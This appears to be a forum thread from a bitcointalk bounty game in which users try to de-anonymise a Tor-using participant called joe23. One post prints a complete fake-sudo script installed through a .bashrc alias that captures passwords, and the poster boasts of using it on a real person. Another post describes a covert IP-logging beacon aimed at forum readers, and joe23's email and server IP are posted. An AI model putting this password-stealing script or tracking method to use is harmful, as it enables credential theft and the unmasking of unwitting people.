[joe is dead] http://findmeifyoucan.eu

[OpenYourEyes]

You seem to have most things covered; but, the more complex you make the chain, the easier it is to slip up and forget/misconfigure something.
Everything were talking about here is what I'm specialising in at University at the moment: digital & anti forensics/security.

OpenYourEyes, I'd like to reward your effort if you give me an address, I will.

Thanks.
1HUnQSAEto29XC5PeHUbaWkPUhec7W7DJN

I'm off to grab a bite to eat; I'll rack my brains when I come back to see what else can be done/is being missed. Hopefully we can get even more input from people on this aswell.

[1715193915]

1715193915

[1715193915]

1715193915

[OpenYourEyes]

What's to stop the hacker from spoofing the DNS record for tormail, SR, etc and sending your to another server.

This is exactly what I was going to do if he gave us (or I managed to get) access to his server. He's using Linux so this doesn't apply, but some commonly installed Windows applications check for updates without forcing the use of https. It isn't too hard to trick the software into running your own "update" which would give you pretty much unrestricted access to do whatever you like on the victims machine.

I've done things like that in the past, but as you say he's using linux (debian, so nmap says) so it's package manager will check the signature of all packages.

Here's something else which I was intending to do:

If he's using bash, then create an alias within .bash_rc, and link sudo calls to a simple password capturing script.
e.g.
within .bash_rc:
alias sudo="passwordCapture.sh"

Now any time sudo is called (e.g. sudo apt-get update); sudo calls the following 'fake sudo' script which logs the password to a file, tells the user it is wrong, and calls the legit sudo program with the arguments originally passed.

#!/bin/bash
stty -echo
read -p "[sudo] password for $(whoami): " passw; echo
stty echo
echo $passw >> password.txt
echo "Sorry, try again."
echo "sudo $*" | sh

I done this many years ago to my old IT technician, but made the script more fancy by deleting any references once it had complete: he was none the wiser.

--
Thanks joe23, got your transfer.

[joe23]

You seem to have most things covered; but, the more complex you make the chain, the easier it is to slip up and forget/misconfigure something.
Everything were talking about here is what I'm specialising in at University at the moment: digital & anti forensics/security.

cool.

sent a little bit to you address as can be seen in this updated screenshot of joes wallet:
(I had to use the VPS proxy to upload it, imgur disallows tor)

https://i.imgur.com/fJdtu.png

OOOPS! I accidentally had electrums connection setup dialog open when I took the screenshot.

[Blazr]

Problem is I need a non-tor exit point somewhere for bitcointalk.org. Any other ideas on how to post to bitcointalk?

If I remember correctly, only signing up using TOR is banned, you can actually login and post using TOR no problem.

[joe23]

Problem is I need a non-tor exit point somewhere for bitcointalk.org. Any other ideas on how to post to bitcointalk?

If I remember correctly, only signing up using TOR is banned, you can actually login and post using TOR no problem.

Ah, good to know.

I think you also deserve some payment for your effort if you share an address. I hope I didn't miss anyone else? afaik I so far gave some monetary incentives to:

• MysteryMiner
• Jasinlee
• Openyoureyes

[AndrewBUD]

Curious if Theymos has a sign up IP which is different than the current IP used...

[joe23]

Curious if Theymos has a sign up IP which is different than the current IP used...

Maybe he's open to helping you guys by releasing any info he has on joe23 (with my consent)?

So if you ask him and he's ok with it, I will give him my consent to publish anything he has on me in this thread.

[OpenYourEyes]

-

[Nite69]

I use

  #> ssh -D 0.0.0.0:55555 joe23@188.165.73.235 -o ProxyCommand="~/bin/connect -4 -S localhost:9050 %h %p"

to ssh to the VPS and at the same time setup the proxy, which I connect to using

Would it be safe to add -X to the ssh command and then run firefox (or other browser, bitcoin client etc) on the VPS (or rent another VPS) to do all Joe's jobs? Also, would it be more secure to use certificate on a smartcard for the connection, not passwords.

[SysRun]

wow, this bounty keeps climbing, huh?

[jasinlee]

If you are going to pull a heist, its good to know your prepared

[flatfly]

You seem to have most things covered; but, the more complex you make the chain, the easier it is to slip up and forget/misconfigure something.
Everything were talking about here is what I'm specialising in at University at the moment: digital & anti forensics/security.

cool.

sent a little bit to you address as can be seen in this updated screenshot of joes wallet:
(I had to use the VPS proxy to upload it, imgur disallows tor)



OOOPS! I accidentally had electrums connection setup dialog open when I took the screenshot.

Increase your Electrum anonymity by connecting to a Tor *hidden* service rather than
a regular server. This helps prevent server operators from connecting some dots...

More info:
https://bitcointalk.org/index.php?topic=113116.0

[Nite69]

theymos is pissed at me and releases my PMs publicly.

In those PMs you can see me asking MysteryMiner wether he was one of the german guys wearing masks at the Conference in London.

Can we assume he was in that conference? Maybe he is in one of the videos here: http://bitcoin2012.com/

[cheebydi]

As this thread is highly informative and entertaining I'd like to add 1 BTC to the bounty.

Joe23 please provide me with an address or an escrow where I can send it.

[joe23]

As this thread is highly informative and entertaining I'd like to add 1 BTC to the bounty.

Joe23 please provide me with an address or an escrow where I can send it.

Awesome!

I could give you an address from joes wallet, but would prefer someone to do escrow for us.

[joe23]

ok guys and girls, where to go from here?

It seems to me I'm pretty safe for now, right? Many possible flaws and improvements have been pointed out but none of them lead to you guys getting close to me.

That bitcointalk-posting-time-attack seems hard to pull off and will likely take weeks to deliver meaningful data.

I pretty much decided to "have the VPS compromised" at some point, but I think I should wait with that since it could be over pretty quickly after that and I must say I'm quite enjoying this and learning a lot.

So maybe I should try to do some more stuff that might endanger my anonymity to make it more interesting? Like pop up on irc and chat with you guys or something.

Open for any suggestions that don't involve me actually doing anything illegal.

Heres your chance to set up some trap

[OpenYourEyes]

Is your IP at all 24.143.xx.xx or 217.114.xx.xx (xx'd for privacy), or are you Smoothie, or someguy123. (Took a few stabs there).

I'm in the process of doing an explanation for my results.

My original intention was to try and use Flash to log your true IP:
Plugins such as Adobe Flash don't normally respect your browsers proxy settings (this must have changed recently, or I went about it the wrong way because it didn't work).

My post above contained a tracking beacon which was logging IPs & useragents; the link in my post went to a free hosting provider which I set up using a manner of techniques to log information about visitors (using JavaScript, PHP, and an embedded flash player which was requesting a video from my server), and then after a few seconds forwarded you to a legit blog post.
The Flash player method is the one I was relying on the most (the others were just a fallback in case you messed up somewhere - apparently not), but it doesn't seemed to have worked.
Although, sifting through nearly 60 different IPs and browser information, and then doing lookups on them is quite cumbersome.

I had one visitor come to the site which was using a TOR connection (195.177.253.113), I took a stab in the dark in believing it was you. I know you use Linux, and the useragent matches up. Doing searches on this useragent from the last couple of days lead me to two members here: Smoothie, and someguy123: quite confident it's not you though.

This IP (217.114.xx.xx) got me slightly excited as it originates from Dublin, and your server IP also gave references to Dublin. Plus, the useragent seems to be one of Ubuntu. I'm just linking random data here together, but there is not much else to go on.

I got suspicious with this IP (24.143.xx.xx) as one moment the data originated from a Windows box, but minutes later it was a Ubuntu one.

And finally, these two (85.127.xx.xx, 81.246.xx.xx) visited the website three times in total, all within 30seconds of each other. Not implying these are you, but strange behaviour was noted in my logs.

[fergalish]

This is a great thread. If I had to make a suggestion, I would connect to some translation service over tor, translate what you want to write into some other language, then translate back to English, then post it (better would be to install a local translator). Your English is almost perfect - definitely better than any automatic translation - but that only narrows it down to, oh, maybe 400 million native English speakers. The few mistakes I noticed could either be genuine typos, or maybe deliberate. If I wanted to try, I'd ask you a question which requires an answer with a word such as "randomi(s/z)e" or "trunk/boot" (US & UK respectively for those with English as 2nd language). I just can't think of a suitable question right now.

To connect, I would use TAILS. It sets up two virtual machines within an OS running from an USB drive - one of the vm's runs a TOR server, the other vm's network card is routed through that TOR instance. The user interacts only with the 2nd so no need to worry about DNS, java, flash leaks etc - except if something breaks the vm enclosure I suppose. I haven't tried it out, but it seems really good.

Someone suggested running firefox through x11 forwarding in the torified ssh tunnel. I'd have to say that'd be really slow. You might get away with w3m or lynx maybe, but that might narrow you down even more - how many text-based browser users can there still be in the world?

[theymos]

So if you ask him and he's ok with it, I will give him my consent to publish anything he has on me in this thread.

joe23@tormail.org
188.165.73.235
Ignores BitcoinINV

[fergalish]

My post above contained a tracking beacon which was logging IPs & useragents; the link in my post went to a free hosting provider which I set up using a manner of techniques to log information about visitors (using JavaScript, PHP, and an embedded flash player which was requesting a video from my server), and then after a few seconds forwarded you to a legit blog post.

Fascinating! How can you possibly embed such code in a forum post? Surely this indicates a serious bug in SMF, the forum software?

One of the IP addresses you mention is mine, and I'm not joe23. Thanks for doing the xx.xx'ing - I'd hate to have a bunch of you guys suddenly trying to hack my box!